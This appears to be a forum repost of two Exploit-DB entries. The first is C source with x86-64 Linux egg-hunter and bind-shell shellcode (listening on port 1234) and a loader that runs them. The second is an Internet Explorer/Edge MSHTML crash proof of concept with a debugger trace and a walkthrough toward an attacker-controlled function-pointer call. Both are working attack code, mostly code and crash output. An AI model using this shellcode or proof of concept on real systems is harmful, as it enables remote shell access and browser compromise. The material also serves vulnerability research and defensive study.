/** Copyright © 2017 Odzhan. All Rights Reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ; 38 byte Egg Hunter using sys_access() for x86-64 Linux ; bits 64 xor edi, edi ; rdi = 0 mul edi ; rax = 0, rdx = 0 xchg eax, esi ; rsi = F_OK mov dh, 10h ; rdx = 4096 nxt_page: add rdi, rdx ; advance 4096 bytes nxt_addr: push rdi ; save page address add rdi, 8 ; try read 8 bytes ahead push 21 pop rax ; rax = sys_access syscall pop rdi ; restore rdi cmp al, 0xF2 ; -EFAULT means bad address je nxt_page ; keep going until good read ; put your own signature here mov eax, 0xDEADC0DE scasd jne nxt_addr scasd jne nxt_addr jmp rdi ; jump into shellcode */ #include <stdio.h> #include <string.h> #include <stdint.h> #include <stdlib.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/mman.h> #define EGG64_SIZE 38 char EGG64[] = { /* 0000 */ "\x31\xff" /* xor edi, edi */ /* 0002 */ "\xf7\xe7" /* mul edi */ /* 0004 */ "\x96" /* xchg esi, eax */ /* 0005 */ "\xb6\x10" /* mov dh, 0x10 */ /* 0007 */ "\x48\x01\xd7" /* add rdi, rdx */ /* 000A */ "\x57" /* push rdi */ /* 000B */ "\x48\x83\xc7\x08" /* add rdi, 0x8 */ /* 000F */ "\x6a\x15" /* push 0x15 */ /* 0011 */ "\x58" /* pop rax */ /* 0012 */ "\x0f\x05" /* syscall */ /* 0014 */ "\x5f" /* pop rdi */ /* 0015 */ "\x3c\xf2" /* cmp al, 0xf2 */ /* 0017 */ "\x74\xee" /* jz 0x7 */ /* 0019 */ "\xb8\xde\xc0\xad\xde" /* mov eax, 0xdeadc0de */ /* 001E */ "\xaf" /* scasd */ /* 001F */ "\x75\xe9" /* jnz 0xa */ /* 0021 */ "\xaf" /* scasd */ /* 0022 */ "\x75\xe6" /* jnz 0xa */ /* 0024 */ "\xff\xe7" /* jmp rdi */ }; // sig is 0xDEADC0DE #define EGG_SIG "\xDE\xC0\xAD\xDE" // 71 byte bind shell for x86-64 Linux. // listens on 0.0.0.0:1234 // // port offset is 0x010 // char BS[] = { EGG_SIG EGG_SIG /* 0000 */ "\x6a\x29" /* push 0x29 */ /* 0002 */ "\x58" /* pop rax */ /* 0003 */ "\x6a\x01" /* push 0x1 */ /* 0005 */ "\x5e" /* pop rsi */ /* 0006 */ "\x6a\x02" /* push 0x2 */ /* 0008 */ "\x5f" /* pop rdi */ /* 0009 */ "\x99" /* cdq */ /* 000A */ "\x0f\x05" /* syscall */ /* 000C */ "\x97" /* xchg edi, eax */ /* 000D */ "\xbb\x02\xff\x04\xd2" /* mov ebx, 0xd204ff02 */ /* 0012 */ "\xfe\xc7" /* inc bh */ /* 0014 */ "\x53" /* push rbx */ /* 0015 */ "\x54" /* push rsp */ /* 0016 */ "\x5e" /* pop rsi */ /* 0017 */ "\xb2\x10" /* mov dl, 0x10 */ /* 0019 */ "\xb0\x31" /* mov al, 0x31 */ /* 001B */ "\x0f\x05" /* syscall */ /* 001D */ "\x31\xf6" /* xor esi, esi */ /* 001F */ "\xb0\x32" /* mov al, 0x32 */ /* 0021 */ "\x0f\x05" /* syscall */ /* 0023 */ "\xb0\x2b" /* mov al, 0x2b */ /* 0025 */ "\x0f\x05" /* syscall */ /* 0027 */ "\x97" /* xchg edi, eax */ /* 0028 */ "\x96" /* xchg esi, eax */ /* 0029 */ "\xb0\x21" /* mov al, 0x21 */ /* 002B */ "\x0f\x05" /* syscall */ /* 002D */ "\x83\xee\x01" /* sub esi, 0x1 */ /* 0030 */ "\x79\xf7" /* jns 0x29 */ /* 0032 */ "\x31\xf6" /* xor esi, esi */ /* 0034 */ "\x50" /* push rax */ /* 0035 */ "\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* mov rcx, 0x68732f2f6e69622f */ /* 003F */ "\x51" /* push rcx */ /* 0040 */ "\x54" /* push rsp */ /* 0041 */ "\x5f" /* pop rdi */ /* 0042 */ "\x99" /* cdq */ /* 0043 */ "\xb0\x3b" /* mov al, 0x3b */ /* 0045 */ "\x0f\x05" /* syscall */ }; void xcode(char *s, int len) { uint8_t *p; p=(uint8_t*)mmap (0, len, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); memcpy(p, s, len); // execute ((void(*)())p)(); munmap ((void*)p, len); } int main(int argc, char *argv[]) { uint8_t *sc=(uint8_t*)mmap (0, sizeof(BS), PROT_EXEC | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); if (sc != NULL) { memcpy (sc, BS, sizeof(BS)); xcode (EGG64, EGG64_SIZE); munmap((void*)sc, sizeof(BS)); } return 0; } Sursa: https://www.exploit-db.com/exploits/41439/

<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1011 PoC: --> <!-- saved from url=(0014)about:internet --> <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; } </script> <body onload="setInterval(boom,100)"> <table cellspacing="0"> <tr class="class1"> <th id="th1" colspan="5" width=0></th> <th class="class2" width=0><div class="class2"></div></th> <!-- Note: The analysis below is based on an 64-bit IE (running in single process mode) running on Windows Server 2012 R2. Microsoft Symbol Server has been down for several days and that's the only configuration for which I had up-to-date symbols. However Microsoft Edge and 32-bit IE 11 should behave similarly. The PoC crashes in MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement when reading from address 0000007800000070 (5fc.8a4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4: 00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=???????????????? With the following call stack: Child-SP RetAddr Call Site 00000071`0e75b960 00007ffe`8f3f1836 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4 00000071`0e75b9c0 00007ffe`8e9ba9df MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc 00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5 00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147 00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77 00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d 00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageCollection::FormatPage+0x1f3 00000071`0e75be60 00007ffe`8e9affd1 MSHTML!Layout::PageCollection::LayoutPagesCore+0x38c 00000071`0e75c030 00007ffe`8e9b099b MSHTML!Layout::PageCollection::LayoutPages+0x102 00000071`0e75c090 00007ffe`8e9aff45 MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x50b 00000071`0e75c220 00007ffe`8ea74047 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd5 00000071`0e75c2f0 00007ffe`8ea73c95 MSHTML!CMarkupPageLayout::DoLayout+0xf7 00000071`0e75c360 00007ffe`8e98066d MSHTML!CView::ExecuteLayoutTasks+0x17c 00000071`0e75c3f0 00007ffe`8e983b7a MSHTML!CView::EnsureView+0x43f 00000071`0e75c4d0 00007ffe`8e97f82b MSHTML!CPaintController::EnsureView+0x58 00000071`0e75c500 00007ffe`8ea2e47e MSHTML!CPaintBeat::OnBeat+0x41b 00000071`0e75c580 00007ffe`8ea2e414 MSHTML!CPaintBeat::OnPaintTimer+0x5a 00000071`0e75c5b0 00007ffe`8f2765dc MSHTML!CContainedTimerSink<CPaintBeat>::OnTimerMethodCall+0xdb 00000071`0e75c5e0 00007ffe`8e969d52 MSHTML!GlobalWndOnPaintPriorityMethodCall+0x1f7 00000071`0e75c690 00007ffe`afc13fe0 MSHTML!GlobalWndProc+0x1b8 00000071`0e75c710 00007ffe`afc13af2 USER32!UserCallWinProcCheckWow+0x1be 00000071`0e75c7e0 00007ffe`afc13bbe USER32!DispatchClientMessage+0xa2 00000071`0e75c840 00007ffe`b2352524 USER32!_fnDWORD+0x3e 00000071`0e75c8a0 00007ffe`afc1cfaa ntdll!KiUserCallbackDispatcherContinue 00000071`0e75c928 00007ffe`afc1cfbc USER32!ZwUserDispatchMessage+0xa 00000071`0e75c930 00007ffe`95d1bb28 USER32!DispatchMessageWorker+0x2ac 00000071`0e75c9b0 00007ffe`95d324cb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 00000071`0e75fc30 00007ffe`aa81572f IEFRAME!LCIETab_ThreadProc+0x3a3 00000071`0e75fd60 00007ffe`9594925f iertutil!Microsoft::WRL::ActivationFactory<Microsoft::WRL::Implements<Microsoft::WRL::FtmBase,Windows::Foundation::IUriRuntimeClassFactory,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil>,Windows::Foundation::IUriEscapeStatics,Microsoft::WRL::Details::Nil,0>::GetTrustLevel+0x5f 00000071`0e75fd90 00007ffe`b1d313d2 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f 00000071`0e75fde0 00007ffe`b22d54e4 KERNEL32!BaseThreadInitThunk+0x22 00000071`0e75fe10 00000000`00000000 ntdll!RtlUserThreadStart+0x34 And the following register values: rax=0000007800000070 rbx=0000000000000064 rcx=0000007800000050 rdx=0000000000000048 rsi=00000079164a8f01 rdi=00007ffe8f9f81b0 rip=00007ffe8f330a59 rsp=000000710e75b960 rbp=0000007916492fe8 r8=0000007916490ec0 r9=000000710e75b980 r10=00000079164a8f30 r11=000000710e75b928 r12=000000710e75c000 r13=0000007916450fc8 r14=000000791648ec60 r15=0000007911ec9f50 Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address. Let's take a look at the code around the rip of the crash. 00007ffe`8f330a51 488bcd mov rcx,rbp 00007ffe`8f330a54 e8873c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0) 00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=???????????????? 00007ffe`8f330a5d 743d je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c) 00007ffe`8f330a5f 488bcd mov rcx,rbp 00007ffe`8f330a62 e8793c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0) 00007ffe`8f330a67 488b30 mov rsi,qword ptr [rax] 00007ffe`8f330a6a 488b06 mov rax,qword ptr [rsi] 00007ffe`8f330a6d 488bb848030000 mov rdi,qword ptr [rax+348h] 00007ffe`8f330a74 488bcf mov rcx,rdi 00007ffe`8f330a77 ff155b95d700 call qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)] 00007ffe`8f330a7d 488bce mov rcx,rsi 00007ffe`8f330a80 ffd7 call rdi On 00007ffe`8f330a51 rxc is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations). On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory. However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the firs th element. Let's see what happens if an attacker can point rax to the memory he/she controls. Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80. --> Sursa: https://www.exploit-db.com/exploits/41454/